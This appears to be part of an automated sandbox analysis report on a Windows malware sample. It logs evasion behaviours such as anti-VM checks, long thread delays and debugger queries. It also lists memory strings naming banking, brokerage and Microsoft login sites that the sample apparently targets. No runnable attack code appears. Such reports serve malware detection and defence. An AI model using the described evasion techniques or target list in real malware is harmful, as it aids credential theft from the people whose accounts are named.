                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: mKv3sKQ5Q4E7waF.exe PID: 6760, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D324
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D7E4
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D944
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D504
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D544
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60D1E4
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B610154
                Source: C:\Windows\SysWOW64\help.exeAPI/Special instruction interceptor: Address: 7FFC1B60DA44
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 8D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 25B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 45B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 8550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 9550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: 9750000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeMemory allocated: A750000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B096E rdtsc 3_2_019B096E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5439Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1281Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 8583Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeWindow / User API: threadDelayed 1389Jump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\help.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exe TID: 6828Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2852Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1548Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep count: 8583 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep time: -17166000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep count: 1389 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\help.exe TID: 2788Thread sleep time: -2778000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep count: 44 > 30Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep time: -66000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep count: 45 > 30Jump to behavior
                Source: C:\Program Files (x86)\LDsBGCsoCrdAiRXsZgXeKSzIPBXuhxJIagLzIlsdTdhNZsKrPyMfUrpkVl\vnV7v1GankdEyS2eDT.exe TID: 6864Thread sleep time: -45000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 6188Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_0061C3D0 FindFirstFileW,FindNextFileW,FindClose,6_2_0061C3D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: 728o34HL.6.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 728o34HL.6.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 728o34HL.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 728o34HL.6.drBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 728o34HL.6.drBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: 728o34HL.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: AMC password management pageVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: mKv3sKQ5Q4E7waF.exe, 00000000.00000002.845792819.00000000007AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: svchost.exe, 0000000A.00000002.2836624117.0000022787027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.2839000359.000002278C655000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 728o34HL.6.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 728o34HL.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 728o34HL.6.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 728o34HL.6.drBinary or memory string: discord.comVMware20,11696492231f
                Source: help.exe, 00000006.00000002.3289014379.000000000066E000.00000004.00000020.00020000.00000000.sdmp, vnV7v1GankdEyS2eDT.exe, 00000008.00000002.3289224574.0000000000449000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.1291324910.00000211928FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 728o34HL.6.drBinary or memory string: global block list test formVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: 728o34HL.6.drBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 728o34HL.6.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 728o34HL.6.drBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 728o34HL.6.drBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: 728o34HL.6.drBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: 728o34HL.6.drBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 728o34HL.6.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: 728o34HL.6.drBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 728o34HL.6.drBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 728o34HL.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 728o34HL.6.drBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\help.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B096E rdtsc 3_2_019B096E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_004178B3 LdrLoadDll,3_2_004178B3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F019F mov eax, dword ptr fs:[00000030h]3_2_019F019F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F019F mov eax, dword ptr fs:[00000030h]3_2_019F019F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F019F mov eax, dword ptr fs:[00000030h]3_2_019F019F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F019F mov eax, dword ptr fs:[00000030h]3_2_019F019F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196A197 mov eax, dword ptr fs:[00000030h]3_2_0196A197
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196A197 mov eax, dword ptr fs:[00000030h]3_2_0196A197
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196A197 mov eax, dword ptr fs:[00000030h]3_2_0196A197
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B0185 mov eax, dword ptr fs:[00000030h]3_2_019B0185
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A14180 mov eax, dword ptr fs:[00000030h]3_2_01A14180
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A14180 mov eax, dword ptr fs:[00000030h]3_2_01A14180
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2C188 mov eax, dword ptr fs:[00000030h]3_2_01A2C188
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A2C188 mov eax, dword ptr fs:[00000030h]3_2_01A2C188
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A461E5 mov eax, dword ptr fs:[00000030h]3_2_01A461E5
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE1D0 mov eax, dword ptr fs:[00000030h]3_2_019EE1D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE1D0 mov eax, dword ptr fs:[00000030h]3_2_019EE1D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE1D0 mov ecx, dword ptr fs:[00000030h]3_2_019EE1D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE1D0 mov eax, dword ptr fs:[00000030h]3_2_019EE1D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019EE1D0 mov eax, dword ptr fs:[00000030h]3_2_019EE1D0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A361C3 mov eax, dword ptr fs:[00000030h]3_2_01A361C3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A361C3 mov eax, dword ptr fs:[00000030h]3_2_01A361C3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A01F8 mov eax, dword ptr fs:[00000030h]3_2_019A01F8
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov eax, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov ecx, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov eax, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov eax, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov ecx, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov eax, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov eax, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov ecx, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov eax, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1E10E mov ecx, dword ptr fs:[00000030h]3_2_01A1E10E
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A30115 mov eax, dword ptr fs:[00000030h]3_2_01A30115
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1A118 mov ecx, dword ptr fs:[00000030h]3_2_01A1A118
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1A118 mov eax, dword ptr fs:[00000030h]3_2_01A1A118
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1A118 mov eax, dword ptr fs:[00000030h]3_2_01A1A118
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A1A118 mov eax, dword ptr fs:[00000030h]3_2_01A1A118
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019A0124 mov eax, dword ptr fs:[00000030h]3_2_019A0124
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196C156 mov eax, dword ptr fs:[00000030h]3_2_0196C156
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44164 mov eax, dword ptr fs:[00000030h]3_2_01A44164
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A44164 mov eax, dword ptr fs:[00000030h]3_2_01A44164
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976154 mov eax, dword ptr fs:[00000030h]3_2_01976154
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01976154 mov eax, dword ptr fs:[00000030h]3_2_01976154
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A04144 mov eax, dword ptr fs:[00000030h]3_2_01A04144
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A04144 mov eax, dword ptr fs:[00000030h]3_2_01A04144
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A04144 mov ecx, dword ptr fs:[00000030h]3_2_01A04144
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A04144 mov eax, dword ptr fs:[00000030h]3_2_01A04144
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A04144 mov eax, dword ptr fs:[00000030h]3_2_01A04144
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A08158 mov eax, dword ptr fs:[00000030h]3_2_01A08158
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A080A8 mov eax, dword ptr fs:[00000030h]3_2_01A080A8
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A360B8 mov eax, dword ptr fs:[00000030h]3_2_01A360B8
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A360B8 mov ecx, dword ptr fs:[00000030h]3_2_01A360B8
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197208A mov eax, dword ptr fs:[00000030h]3_2_0197208A
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019680A0 mov eax, dword ptr fs:[00000030h]3_2_019680A0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F20DE mov eax, dword ptr fs:[00000030h]3_2_019F20DE
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196C0F0 mov eax, dword ptr fs:[00000030h]3_2_0196C0F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019B20F0 mov ecx, dword ptr fs:[00000030h]3_2_019B20F0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0196A0E3
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019780E9 mov eax, dword ptr fs:[00000030h]3_2_019780E9
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F60E0 mov eax, dword ptr fs:[00000030h]3_2_019F60E0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E016 mov eax, dword ptr fs:[00000030h]3_2_0198E016
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E016 mov eax, dword ptr fs:[00000030h]3_2_0198E016
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E016 mov eax, dword ptr fs:[00000030h]3_2_0198E016
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0198E016 mov eax, dword ptr fs:[00000030h]3_2_0198E016
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A06030 mov eax, dword ptr fs:[00000030h]3_2_01A06030
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F4000 mov ecx, dword ptr fs:[00000030h]3_2_019F4000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01A12000 mov eax, dword ptr fs:[00000030h]3_2_01A12000
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196A020 mov eax, dword ptr fs:[00000030h]3_2_0196A020
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196C020 mov eax, dword ptr fs:[00000030h]3_2_0196C020
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01972050 mov eax, dword ptr fs:[00000030h]3_2_01972050
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019F6050 mov eax, dword ptr fs:[00000030h]3_2_019F6050
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199C073 mov eax, dword ptr fs:[00000030h]3_2_0199C073
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01968397 mov eax, dword ptr fs:[00000030h]3_2_01968397
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01968397 mov eax, dword ptr fs:[00000030h]3_2_01968397
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_01968397 mov eax, dword ptr fs:[00000030h]3_2_01968397
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199438F mov eax, dword ptr fs:[00000030h]3_2_0199438F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0199438F mov eax, dword ptr fs:[00000030h]3_2_0199438F
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E388 mov eax, dword ptr fs:[00000030h]3_2_0196E388
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E388 mov eax, dword ptr fs:[00000030h]3_2_0196E388
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0196E388 mov eax, dword ptr fs:[00000030h]3_2_0196E388
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019783C0 mov eax, dword ptr fs:[00000030h]3_2_019783C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019783C0 mov eax, dword ptr fs:[00000030h]3_2_019783C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019783C0 mov eax, dword ptr fs:[00000030h]3_2_019783C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_019783C0 mov eax, dword ptr fs:[00000030h]3_2_019783C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A3C0 mov eax, dword ptr fs:[00000030h]3_2_0197A3C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A3C0 mov eax, dword ptr fs:[00000030h]3_2_0197A3C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A3C0 mov eax, dword ptr fs:[00000030h]3_2_0197A3C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A3C0 mov eax, dword ptr fs:[00000030h]3_2_0197A3C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A3C0 mov eax, dword ptr fs:[00000030h]3_2_0197A3C0
                Source: C:\Users\user\Desktop\mKv3sKQ5Q4E7waF.exeCode function: 3_2_0197A3C0 mov eax, dword ptr fs:[00000030h]3_2_0197A3C0
